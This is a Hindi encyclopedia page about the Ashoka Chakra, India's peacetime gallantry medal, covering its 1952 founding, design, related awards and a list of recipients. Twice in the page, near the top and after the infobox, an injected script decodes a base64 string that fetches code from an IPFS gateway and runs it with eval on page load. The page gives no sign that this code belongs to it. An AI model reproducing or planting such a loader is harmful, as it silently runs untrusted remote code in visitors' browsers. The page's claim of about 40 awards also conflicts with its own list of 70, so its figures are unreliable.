अशोक चक्र (पदक)

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
Disamb2.jpg अशोक चक्र एक बहुविकल्पी शब्द है अन्य अर्थों के लिए देखें:- अशोक चक्र

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

अशोक चक्र (पदक)
अशोक चक्र
विवरण 'अशोक चक्र' शांति काल में दिया जाने वाला वीरता सम्मान है। यह युद्ध के अतिरिक्‍त शौर्य, बहादुरी और बलिदान के लिए दिया जाता है।
स्थापना 4 जनवरी, 1952
देश भारत
प्रकार पदक
स्वरूप एवं आकार 3/8 इंच व्‍यास का सोने का गोल टुकड़ा। इसमें लगे रिबन की लंबाई 31 मिलीमीटर, 15 मिलीमीटर चौड़ाई, रंग गहरा हरा, बीच में 2 मिमी की केसरिया पट्टी।
संबंधित लेख परमवीर चक्र, महावीर चक्र, वीर चक्र, कीर्ति चक्र, शौर्य चक्र
अन्य जानकारी 1 फरवरी 1999 से केंद्र सरकार ने अशोक चक्र के लिए 1400 रुपए का मासिक भत्‍ता निर्धारित किया।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

अशोक चक्र शांति काल में दिया जाने वाला वीरता सम्मान है। यह युद्ध के अतिरिक्‍त शौर्य, बहादुरी और बलिदान के लिए दिया जाता है। इस सम्मान का वहीं महत्‍व है जो युद्ध काल में परमवीर चक्र का है। अशोक चक्र गैर युद्ध प्रसंग में वीरता के लिए सैनिकों और आम नागरिकों, सबके लिए है। इस पुरस्कार को श्रेष्ठता के तीन स्तरों पर दिया जाता है। वर्ष 1960 से, सेना पदक देने का क्रम शुरू किया गया। यह पदक थलसेना, वायु सेना, नौसेना तीनों के लिए अलग अलग देना सुनिश्चित किया गया। इस पुरस्कार को देने का निर्णय भी वीरता और विशिष्टता के आधार पर तय किया गया।

स्‍थापना

यह सम्मान सेना के जवान, आम नागरिक को जीवित या मरणोपरांत दिया जाता है। आज़ादी के बाद से क़रीब 40 अशोक चक्र सम्‍मान दिए गए हैं। इस सम्मान की स्‍थापना 4 जनवरी 1952 को हुई। तब इसका नाम ‘अशोक चक्र, वर्ग-1’ था। सन् 1967 में इस सम्मान से वर्ग की शर्त का हटा दिया गया और इसके तीन सम्मान घोषित किए गए। इनका नामकरण ‘अशोक चक्र’, ‘कीर्ति चक्र’ और ‘शौर्य चक्र’ किया गया। 1 फरवरी 1999 से केंद्र सरकार ने अशोक चक्र के लिए 1400 रुपए का मासिक भत्‍ता निर्धारित किया।

अशोक चक्र का आकार

3/8 इंच व्‍यास का सोने का गोल टुकड़ा। बीच में अशोक चक्र की प्रतिकृति, जो कि कलम की पंखुड़ियों से घिरी रहती है। पदक की परिधि को समेटते हुए अशोक चक्र नाम। दूसरी ओर कमल के फूल की उभरी प्रतिकृति। इसमें लगे रिबन की लंबाई 31 मिलीमीटर, 15 मिलीमीटर चौड़ाई, रंग गहरा हरा, बीच में 2 मिमी की केसरिया पट्टी।

सेवा पुरस्‍कार

युद्ध के समय दिए जाने वाले सबसे बड़े सैन्‍य सम्मान में परमवीर चक्र, महावीर चक्र और वीर चक्र शामिल है। वहीं शांति काल में इसी श्रेणी के पुरस्‍कार अशोक चक्र, कीर्ति चक्र और शौर्य चक्र हैं। विशिष्‍ट सेवा के लिए सेना मेडल, नौसेना मेडल और वायु सेना मेडल प्रदान किया जाता है। इसके अलावा परम विशिष्‍ट सेवा मेडल और अतिविशिष्‍ट सेवा मेडल भी प्रदान किया जाता है।

अशोक चक्र प्राप्तकर्ताओं की सूची

क्रम वर्ष नाम क्रम वर्ष नाम
1. 1952 नरबहादुर थापा 2. 1952 बचित्तर सिंह
3. 1952 सुहास बिस्वास 4. 1956 सुंदर सिंह
5. 1957 जोगिंदर सिंह 6. 1957 पी. एम. रमन
7. 1957 जे. आर. चिटनीस 8. 1958 जैश बाजीराव सकपाल
9. 1958 एरिक जेम्स टकर 10. 1962 खरका बहादुर लिनिबु
11. 1965 जिया लाल गुप्ता 12. 1969 जस राम सिंह
13. 1972 उम्मेद सिंह मेहरा 14. 1974 गुरुनाम सिंह
15. 1981 साइरस अद्दी पीठावाला 16. 1984 यूरी मल्यशेव
17. 1984 गेन्नादी स्त्रेकलोव 18. 1985 राकेश शर्मा
19. 1985 भूकांत मिश्रा 20. 1985 छेरिंग मोतुप
21. 1985 निर्भय सिंह 22. 1985 भवानी दत्त जोशी
23. 1985 राम प्रकाश रोपेरिया 24. 1985 जसबीर सिंह रैना
25. 1987 नीरजा भनोट 26. 1991 रणधीर प्रसाद वर्मा
27. 1992 संदीप संखला 28. 1993 राकेश सिंह
29. 1994 नीलकंतन जयचंद्रन नायर 30. 1995 हर्ष उदय सिंह गौड़
31. 1995 सुज्जन सिंह 32. 1995 राजीव कुमार जून
33. 1996 अर्जुन सिंह जसरोतिया 34. 1997 शांति स्वरूप राणा
35. 1997 पुनीत नाथ दत्त 36. 2000 सुधीर कुमार वालिया
37. 2001 कमलेश कुमारी 38. 2001 जगदीश प्रसाद यादव
39. 2002 रामबीर सिंह तोमर 40. 2002 सुरिंदर सिंह
41. 2004 संजोग छेत्री 42. 2004 त्रिवेणी सिंह
43. 2007 वसंत वेणुगोपाल 44. 2007 चुन्नी लाल
45. 2007 राधाकृष्णन ने नायर हर्षन 46. 2008 दिनेश रघु रमन
47. 2009 प्रमोद कुमार सतपथी 48. 2009 आर. पी. डिएन्ग्दोह
49. 2009 मोहित शर्मा 50. 2009 बहादुर सिंह बोहरा
51. 2009 हेमंत करकरे 52. 2009 विजय सालस्कर
53. 2009 अशोक कामटे 54. 2009 तुकाराम ओम्बले
55. 2009 गजेंद्र सिंह बिष्ट 56. 2009 संदीप उन्नीकृष्णन
57. 2009 मोहन चंद शर्मा 58. 2009 जोजन थॉमस
59. 2010 डी. श्रीराम कुमार 60. 2010 राजेश कुमार
61. 2011 लैशराम ज्योतिन सिंह 62. 2012 नवदीप सिंह
63. 2013 लालकृष्ण प्रसाद बाबू 64. 2014 नीरज कुमार सिंह
65. 2014 मुकुंद वरदराजन 66. 2015 मोहन गोस्वामी
67. 2016 हवलदार हंगपन दादा 68. 2017 ज्योति प्रकाश निराला
69. 2019 नजीर अहमद वानी 70. 2021 एएसआई बाबू राम


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख